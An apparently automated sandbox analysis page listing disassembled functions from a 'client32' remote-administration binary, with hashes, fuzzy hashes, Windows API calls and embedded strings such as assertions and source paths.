API ID: Menu$Item$Count$CreateInfoInsertPopup_memset
String ID: 0
API String ID: 74472576-4108050209
Opcode ID: b25f34294336de4f8839e45289e2c114ec1c9262bee8a9cac9f6491c5d519ada
Instruction ID: c294618d83ba700a36b9fba62bf733376f49e09b6547452e6c31807948eb4840
Opcode Fuzzy Hash: b25f34294336de4f8839e45289e2c114ec1c9262bee8a9cac9f6491c5d519ada
Instruction Fuzzy Hash: 7A21AC7180022CABDB24DF50DC88BEEF7B8EB49719F0040A8E519A6540CBB45B84CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 1111B710 Relevance: 13.6, APIs: 9, Instructions: 100COMMON

Download Yara Rule

APIs

LoadCursorA.USER32 ref: 1111B72B
DestroyCursor.USER32(?), ref: 1111B742
CreateCursor.USER32(00000000,0000000C,?,?,?,0000000C,?), ref: 1111B794
_free.LIBCMT ref: 1111B7A1
GetCursorPos.USER32(?), ref: 1111B7B3
WindowFromPoint.USER32(?,?), ref: 1111B7C4
MapWindowPoints.USER32 ref: 1111B7E0
GetClientRect.USER32 ref: 1111B7EE
PtInRect.USER32(?,?,?), ref: 1111B800

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Cursor$RectWindow$ClientCreateDestroyFromLoadPointPoints_free
String ID:
API String ID: 706824135-0
Opcode ID: e6f9fbd965d81133f2b89c17292f20cbfa02b5dfd73927a2f1a36ed18c4ea921
Instruction ID: 226524b821649ccf1f1a95883727ba8dcebcdd2348bff50d2c30a10b69783e4e
Opcode Fuzzy Hash: e6f9fbd965d81133f2b89c17292f20cbfa02b5dfd73927a2f1a36ed18c4ea921
Instruction Fuzzy Hash: DC31B475A00615AFD704DFB5CD84A7BF7B8FF48705F008529E8258B644E774E941C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 11113570 Relevance: 13.6, APIs: 9, Instructions: 77COMMON

Download Yara Rule

APIs

GetStockObject.GDI32(00000003), ref: 111135A7
FillRect.USER32 ref: 111135C4
FillRect.USER32 ref: 111135D2
SetROP2.GDI32(?,00000007), ref: 111135FE
SetBkMode.GDI32(?,?), ref: 1111360A
SetBkColor.GDI32(?,?), ref: 11113615
SetTextColor.GDI32(?,?), ref: 11113620
SetTextJustification.GDI32(?,?,?), ref: 11113631
SetTextCharacterExtra.GDI32(?,?), ref: 1111363D

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Text$ColorFillRect$CharacterExtraJustificationModeObjectStock
String ID:
API String ID: 1094208222-0
Opcode ID: 1cbc9ed1b46d6c71f90ef3a18c70e791402d54b145c2918b3fccb73878480588
Instruction ID: 11fb3597ac11fe0070853bb1276331f7103533f07ae90b5f1526d6834acfdad0
Opcode Fuzzy Hash: 1cbc9ed1b46d6c71f90ef3a18c70e791402d54b145c2918b3fccb73878480588
Instruction Fuzzy Hash: CE2148B1D01128AFDB04DFA4D988AFEB7B8EF48315F104169FD15AB208D7746A01CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 1100D4C0 Relevance: 13.6, APIs: 9, Instructions: 75libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,11196940), ref: 1100D4D4
GetProcAddress.KERNEL32(00000000,11196930), ref: 1100D4E8
GetProcAddress.KERNEL32(00000000,11196920), ref: 1100D4FD
GetProcAddress.KERNEL32(00000000,11196910), ref: 1100D511
GetProcAddress.KERNEL32(00000000,11196904), ref: 1100D525
GetProcAddress.KERNEL32(00000000,111968E4), ref: 1100D53A
GetProcAddress.KERNEL32(00000000,111968C4), ref: 1100D54E
GetProcAddress.KERNEL32(00000000,111968B4), ref: 1100D562
GetProcAddress.KERNEL32(00000000,111968A4), ref: 1100D577

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: AddressProc
String ID:
API String ID: 190572456-0
Opcode ID: 48f9917a60cec6284becfcab2cdcd3c09a63cc3d8906f3dcaa48a20254382f18
Instruction ID: 68c230a61e409724fd33842e5b4cb172798431ad54f26f9eb7569f07803db95b
Opcode Fuzzy Hash: 48f9917a60cec6284becfcab2cdcd3c09a63cc3d8906f3dcaa48a20254382f18
Instruction Fuzzy Hash: E3318CB19127349FEB16CBD8C8C9A79BBE9A758749F80453AD43083248E7B65844CF60

Uniqueness

Uniqueness Score: -1.00%

Function 110F0060 Relevance: 13.6, APIs: 9, Instructions: 70memoryCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 110F0067
GlobalAlloc.KERNEL32(00000042,00000000,00000000,?,110F0E7E,?,?,0CBC1010), ref: 110F009F
ReleaseDC.USER32 ref: 110F00AD

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: AllocGlobalRelease
String ID:
API String ID: 1459782005-0
Opcode ID: ef8989bf252fcdced7cb56a846c0f82ac1b7e672def05fb6ebabdfad37a223a7
Instruction ID: 895e16ec520d13b6265c6dc70c6115b10cf0d765340dc232e34c0638dbe3d9ef
Opcode Fuzzy Hash: ef8989bf252fcdced7cb56a846c0f82ac1b7e672def05fb6ebabdfad37a223a7
Instruction Fuzzy Hash: BF113172A41228A7D3209B949DC9FDBB7ECEB4C716F000179FD19C3604E6755C0043E1

Uniqueness

Uniqueness Score: -1.00%

Function 110027F0 Relevance: 13.6, APIs: 9, Instructions: 58COMMON

Download Yara Rule

APIs

SetROP2.GDI32(?,00000007), ref: 11002807
SelectObject.GDI32(?,?), ref: 1100281A
GetStockObject.GDI32(00000005), ref: 11002821
SelectObject.GDI32(?,00000000), ref: 11002829
Ellipse.GDI32(?,?,?,?,?), ref: 11002847
Rectangle.GDI32(?,?,?,?,?), ref: 1100284F
SelectObject.GDI32(?,?), ref: 1100285A
SelectObject.GDI32(?,?), ref: 11002861
SetROP2.GDI32(?,?), ref: 11002868

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Object$Select$EllipseRectangleStock
String ID:
API String ID: 1843601829-0
Opcode ID: 620863ee41f93a0768b26bff67ea735739fb6c23b1e0fe3f5cf0f1122ac89c1d
Instruction ID: 0884fd21b0f38284b9d1e96bc8cb4ffa9d5bf596259f2d3e1ca5875b7c60ef4b
Opcode Fuzzy Hash: 620863ee41f93a0768b26bff67ea735739fb6c23b1e0fe3f5cf0f1122ac89c1d
Instruction Fuzzy Hash: 67112A75501118BFD704EF99DD84DAFBBACFF89300F018159F91887244CB70AA018BA0

Uniqueness

Uniqueness Score: -1.00%

Function 110E13B0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 144COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 110E1414
std::_Xinvalid_argument.LIBCPMT ref: 110E142A
std::_Xinvalid_argument.LIBCPMT ref: 110E1444
_memmove.LIBCMT ref: 110E14AF
_memmove.LIBCMT ref: 110E14CE

Strings

invalid string position, xrefs: 110E140F
string too long, xrefs: 110E1425, 110E143F

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Xinvalid_argumentstd::_$_memmove
String ID: invalid string position$string too long
API String ID: 2168136238-4289949731
Opcode ID: 052df99301aa79c891ba59b0516b66f2217b59ccfb3a7ebbd94181076e91f896
Instruction ID: 18e91b11eabefdaa2a38ccec96168d260a1d237358dab459284690cf681537c3
Opcode Fuzzy Hash: 052df99301aa79c891ba59b0516b66f2217b59ccfb3a7ebbd94181076e91f896
Instruction Fuzzy Hash: A141A3B2B012458FD724CE5ED8849DEF7EAEBC5764B20492EE552C7780DB70AC418791

Uniqueness

Uniqueness Score: -1.00%

Function 11061710 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 136registryCOMMON

Download Yara Rule

APIs

Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207

InitializeCriticalSection.KERNEL32(0000000C), ref: 11061790
RegCreateKeyExA.ADVAPI32(00000000,00000000,00000000,11195264,00000000,0002001F,00000000,00000008,?,?,00000001,00000001), ref: 110617F5
RegCreateKeyExA.ADVAPI32(00000000,?,00000000,11195264,00000000,00020019,00000000,00000008,?), ref: 1106181C
RegCreateKeyExA.ADVAPI32(00000000,ConfigList,00000000,11195264,00000000,0002001F,00000000,?,?), ref: 1106185B
RegCreateKeyExA.ADVAPI32(?,ConfigList,00000000,11195264,00000000,00020019,00000000,?,?), ref: 1106188F

Strings

ConfigList, xrefs: 11061855, 1106187F
PCICTL, xrefs: 110617BE, 110617C9

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Create$CriticalInitializeSection_malloc_memsetwsprintf
String ID: ConfigList$PCICTL
API String ID: 4014706405-1939909508
Opcode ID: 2c662ba8e1a73180234ba1d403ad4cf72de73a80d5c76a4c65f103bbd16af89e
Instruction ID: f687ffc68a66fe95333fcb084f814ecf12f43e5332dda5a21faccb30f4540590
Opcode Fuzzy Hash: 2c662ba8e1a73180234ba1d403ad4cf72de73a80d5c76a4c65f103bbd16af89e
Instruction Fuzzy Hash: 205130B5A40319AFE710CF65CC85FAABBF8FB84B54F10851AF929DB280D774A504CB50

Uniqueness

Uniqueness Score: -1.00%

Function 1100A390 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 135COMMON

Download Yara Rule

APIs

_sprintf.LIBCMT ref: 1100A415
_sprintf.LIBCMT ref: 1100A457

Strings

Error. soundlevel > 32767, xrefs: 1100A491
f[%d]=%f, < -1.0, xrefs: 1100A451
Warning. %s, xrefs: 1100A41E, 1100A460
Error. soundlevel < -32768 , xrefs: 1100A4A5
f[%d]=%f, > 1.0, xrefs: 1100A40F

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: _sprintf
String ID: Error. soundlevel < -32768 $Error. soundlevel > 32767$Warning. %s$f[%d]=%f, < -1.0$f[%d]=%f, > 1.0
API String ID: 1467051239-371636152
Opcode ID: f275aff281fec65e287fd4839cb214d6aa70ab525a81e0f2bd918c20378b1889
Instruction ID: 522ba922067402ac051fad8bc1310d1daa1aefdf4381fc39071b0cd0fb0c6887
Opcode Fuzzy Hash: f275aff281fec65e287fd4839cb214d6aa70ab525a81e0f2bd918c20378b1889
Instruction Fuzzy Hash: 19416936E04249CBC700DFA8C884ADDFBB4FF85244F6546BDD8981B346DB326995CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 1100F480 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 102COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 1100F4AD
std::_Lockit::_Lockit.LIBCPMT ref: 1100F4D0
std::bad_exception::bad_exception.LIBCMT ref: 1100F554
__CxxThrowException@8.LIBCMT ref: 1100F562
std::_Lockit::_Lockit.LIBCPMT ref: 1100F575
std::locale::facet::_Facet_Register.LIBCPMT ref: 1100F58F

Strings

bad cast, xrefs: 1100F54C

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: LockitLockit::_std::_$Exception@8Facet_RegisterThrowstd::bad_exception::bad_exceptionstd::locale::facet::_
String ID: bad cast
API String ID: 2427920155-3145022300
Opcode ID: 57762707e8b43a866af3cfea117909bd983397719794bce1f1ee13c73e812544
Instruction ID: b8b94bd42515a6f19c70bc81b3c192d65964a6c5da2ad5a69908043983276998
Opcode Fuzzy Hash: 57762707e8b43a866af3cfea117909bd983397719794bce1f1ee13c73e812544
Instruction Fuzzy Hash: BB31E475D002169FDB05CF64D890BEEF7B8EB05369F44066DD926A7280DB72A904CF92

Uniqueness

Uniqueness Score: -1.00%

Function 110CE050 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 100COMMON

Download Yara Rule

APIs

GetWindowRect.USER32 ref: 110CE0C5
GetClientRect.USER32 ref: 110CE0F8
GetWindowRect.USER32 ref: 110CE103

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

m_hWnd, xrefs: 110CE0B0, 110CE0E0
..\ctl32\nsmdlg.cpp, xrefs: 110CE075
e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 110CE0AB, 110CE0DB
hWnd, xrefs: 110CE07A

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Rect$Window$ClientErrorExitLastMessageProcesswsprintf
String ID: ..\ctl32\nsmdlg.cpp$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$hWnd$m_hWnd
API String ID: 2908456680-3958695921
Opcode ID: df5e566ea26e76600d4433a5829a4f848afd28d6b38a31023cdd4e006d51d81b
Instruction ID: 712cfbea46f41dce34da92735377c28625c10b46f47693fc43de73f5d42021ce
Opcode Fuzzy Hash: df5e566ea26e76600d4433a5829a4f848afd28d6b38a31023cdd4e006d51d81b
Instruction Fuzzy Hash: 4A316275D00219AFDB14CFA8CC81EEEFBB4EF49318F1481A9E9566B244D730A944CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 110817B0 Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 79COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 11081859

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

pData, xrefs: 11081814
m_nLength>=nBytes, xrefs: 11081874
..\CTL32\DataStream.cpp, xrefs: 110817CA, 110817E8, 1108180F, 1108182C, 1108186F, 11081896
!m_bReadOnly, xrefs: 11081831
nBytes>=0, xrefs: 110817ED
IsA(), xrefs: 110817CF, 1108189B

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ErrorExitLastMessageProcess_memmovewsprintf
String ID: !m_bReadOnly$..\CTL32\DataStream.cpp$IsA()$m_nLength>=nBytes$nBytes>=0$pData
API String ID: 1528188558-3417006389
Opcode ID: 6f86106b110defa54479cabce7875bddb0ed7807cbaf2af13202954436eb8da3
Instruction ID: 6b38151c30adb73325f8e92f0dfc04dea1f0409a136c72edecfa6b672fa6b7b9
Opcode Fuzzy Hash: 6f86106b110defa54479cabce7875bddb0ed7807cbaf2af13202954436eb8da3
